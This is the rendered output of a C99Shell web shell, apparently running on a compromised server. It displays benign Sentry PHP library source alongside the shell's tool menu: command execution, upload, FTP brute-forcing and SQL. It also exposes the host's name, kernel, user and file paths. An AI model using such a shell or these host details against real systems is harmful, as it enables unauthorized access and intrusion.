!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/sentry/sentry/src/   drwxr-xr-x
Free 29.11 GB of 117.98 GB (24.68%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MonitorSchedule.php (2.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Sentry;

final class 
MonitorSchedule
{
    
/**
     * @var string The type of the schedule
     */
    
private $type;

    
/**
     * @var string|int The value of the schedule
     */
    
private $value;

    
/**
     * @var MonitorScheduleUnit|null The unit of the schedule
     */
    
private $unit;

    public const 
TYPE_CRONTAB 'crontab';

    public const 
TYPE_INTERVAL 'interval';

    
/**
     * @param string                   $type  The type of the schedule
     * @param string|int               $value The value of the schedule
     * @param MonitorScheduleUnit|null $unit  The unit of the schedule
     */
    
public function __construct(
        
string $type,
        
$value,
        ?
MonitorScheduleUnit $unit null
    
) {
        
$this->type $type;
        
$this->value $value;
        
$this->unit $unit;
    }

    public static function 
crontab(string $value): self
    
{
        return new 
self(self::TYPE_CRONTAB$value);
    }

    public static function 
interval(int $valueMonitorScheduleUnit $unit): self
    
{
        return new 
self(self::TYPE_INTERVAL$value$unit);
    }

    public function 
getType(): string
    
{
        return 
$this->type;
    }

    public function 
setType(string $type): self
    
{
        
$this->type $type;

        return 
$this;
    }

    
/**
     * @return string|int
     */
    
public function getValue()
    {
        return 
$this->value;
    }

    
/**
     * @param string|int $value
     */
    
public function setValue($value): self
    
{
        
$this->value $value;

        return 
$this;
    }

    public function 
getUnit(): ?MonitorScheduleUnit
    
{
        return 
$this->unit;
    }

    public function 
setUnit(?MonitorScheduleUnit $unit): self
    
{
        
$this->unit $unit;

        return 
$this;
    }

    
/**
     * @return array<string, string|int>
     */
    
public function toArray(): array
    {
        return [
            
'type' => $this->type,
            
'value' => $this->value,
            
'unit' => (string) $this->unit,
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--